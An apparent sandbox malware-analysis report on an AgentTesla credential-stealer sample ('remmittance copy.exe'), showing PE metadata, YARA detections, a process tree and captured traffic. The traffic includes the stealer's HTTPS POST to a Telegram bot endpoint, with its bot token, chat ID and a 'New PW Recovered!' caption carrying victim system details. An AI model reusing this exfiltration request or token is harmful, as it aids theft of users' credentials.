                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add dword ptr [ecx], eax
                                                                                                add dword ptr [ecx], eax
                                                                                                add dword ptr [ecx], eax
                                                                                                add dword ptr [ecx], eax
                                                                                                add dword ptr [eax], eax
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add dword ptr [eax], eax
                                                                                                add byte ptr [eax], al
                                                                                                add eax, dword ptr [eax]
                                                                                                add byte ptr [eax], al
                                                                                                pop es
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [edi], cl
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [edi], bl
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [edi], bh
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [edi+00h], bh
                                                                                                add byte ptr [eax], al
                                                                                                inc dword ptr [eax]
                                                                                                add byte ptr [eax], al
                                                                                                inc dword ptr [ecx]
                                                                                                add byte ptr [eax], al
                                                                                                inc dword ptr [ebx]
                                                                                                add byte ptr [eax], al
                                                                                                inc dword ptr [edi]
                                                                                                add byte ptr [eax], al
                                                                                                dec dword ptr [edi]
                                                                                                add byte ptr [eax], al
                                                                                                call far fword ptr [edi]
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x651940x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000xae0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x663ec0x66400False0.901651321822data7.80880242174IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x6a0000xae00xc00False0.343098958333data3.55581915248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x6c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_ICON0x6a1200x128GLS_BINARY_LSB_FIRST
                                                                                                RT_ICON0x6a2580x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 133658375, next used block 4294967167
                                                                                                RT_GROUP_ICON0x6a5500x22data
                                                                                                RT_VERSION0x6a5840x35cdata
                                                                                                RT_MANIFEST0x6a8f00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                Translation0x0000 0x04b0
                                                                                                LegalCopyright1999 Nissan R 390 GT1
                                                                                                Assembly Version6.0.0.0
                                                                                                InternalNameFlushWriteAsyncd.exe
                                                                                                FileVersion6.0.0.0
                                                                                                CompanyName
                                                                                                LegalTrademarks
                                                                                                CommentsNissan R
                                                                                                ProductNameShallowBlue
                                                                                                ProductVersion6.0.0.0
                                                                                                FileDescriptionShallowBlue
                                                                                                OriginalFilenameFlushWriteAsyncd.exe

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 28, 2021 07:41:03.979334116 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:03.979391098 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:03.979553938 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:04.065499067 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:04.065516949 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:04.134464025 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:04.134577990 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:04.141242981 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:04.141258955 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:04.141453028 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:04.195493937 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:05.370065928 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:05.397603989 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:05.400892973 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:05.444885969 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:05.497457027 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:05.497586012 CEST44349848149.154.167.220192.168.2.4
                                                                                                Oct 28, 2021 07:41:05.498500109 CEST49848443192.168.2.4149.154.167.220
                                                                                                Oct 28, 2021 07:41:05.499964952 CEST49848443192.168.2.4149.154.167.220

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 28, 2021 07:41:03.827276945 CEST6480153192.168.2.48.8.8.8
                                                                                                Oct 28, 2021 07:41:03.846417904 CEST53648018.8.8.8192.168.2.4

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Oct 28, 2021 07:41:03.827276945 CEST192.168.2.48.8.8.80xcc1fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Oct 28, 2021 07:41:03.846417904 CEST8.8.8.8192.168.2.40xcc1fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.telegram.org

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.449848149.154.167.220443C:\Users\user\Desktop\remmittance copy.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-10-28 05:41:05 UTC0OUTPOST /bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocument HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d999ffec9f8e5b
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 1004
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2021-10-28 05:41:05 UTC0INHTTP/1.1 100 Continue
                                                                                                2021-10-28 05:41:05 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 39 39 66 66 65 63 39 66 38 65 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 33 38 39 37 31 39 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 39 39 66 66 65 63 39 66 38 65 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 34 34 35 38 31 37 0a 4f 53 46 75 6c 6c
                                                                                                Data Ascii: -----------------------------8d999ffec9f8e5bContent-Disposition: form-data; name="chat_id"1373897190-----------------------------8d999ffec9f8e5bContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/445817OSFull
                                                                                                2021-10-28 05:41:05 UTC1INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 28 Oct 2021 05:41:05 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 609
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                {"ok":true,"result":{"message_id":1761,"from":{"id":1975237880,"is_bot":true,"first_name":"yuvtrss","username":"yuvtrss_bot"},"chat":{"id":1373897190,"first_name":"slims","last_name":"Negro","type":"private"},"date":1635399665,"document":{"file_name":"user-445817 2021-10-28 10-44-31.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIG4WF6N_EcEQ1oaOqhOFUXIJAuTS_JAAJzCAAConzQUwL6qliOM8dTIQQ","file_unique_id":"AgADcwgAAqJ80FM","file_size":434},"caption":"New PW Recovered!\n\nUser Name: user/445817\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                Analysis Process: remmittance copy.exe PID: 6336 Parent PID: 6040

                                                                                                General

                                                                                                Start time:07:39:08
                                                                                                Start date:28/10/2021
                                                                                                Path:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\remmittance copy.exe'
                                                                                                Imagebase:0x6b0000
                                                                                                File size:422912 bytes
                                                                                                MD5 hash:C039D3D94F0CC82369C066E26A67E0F6
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Analysis Process: remmittance copy.exe PID: 2248 Parent PID: 6336

                                                                                                General

                                                                                                Start time:07:39:15
                                                                                                Start date:28/10/2021
                                                                                                Path:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                Imagebase:0x140000
                                                                                                File size:422912 bytes
                                                                                                MD5 hash:C039D3D94F0CC82369C066E26A67E0F6
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low

                                                                                                Analysis Process: remmittance copy.exe PID: 3864 Parent PID: 6336

                                                                                                General

                                                                                                Start time:07:39:16
                                                                                                Start date:28/10/2021
                                                                                                Path:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                Imagebase:0xc20000
                                                                                                File size:422912 bytes
                                                                                                MD5 hash:C039D3D94F0CC82369C066E26A67E0F6
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >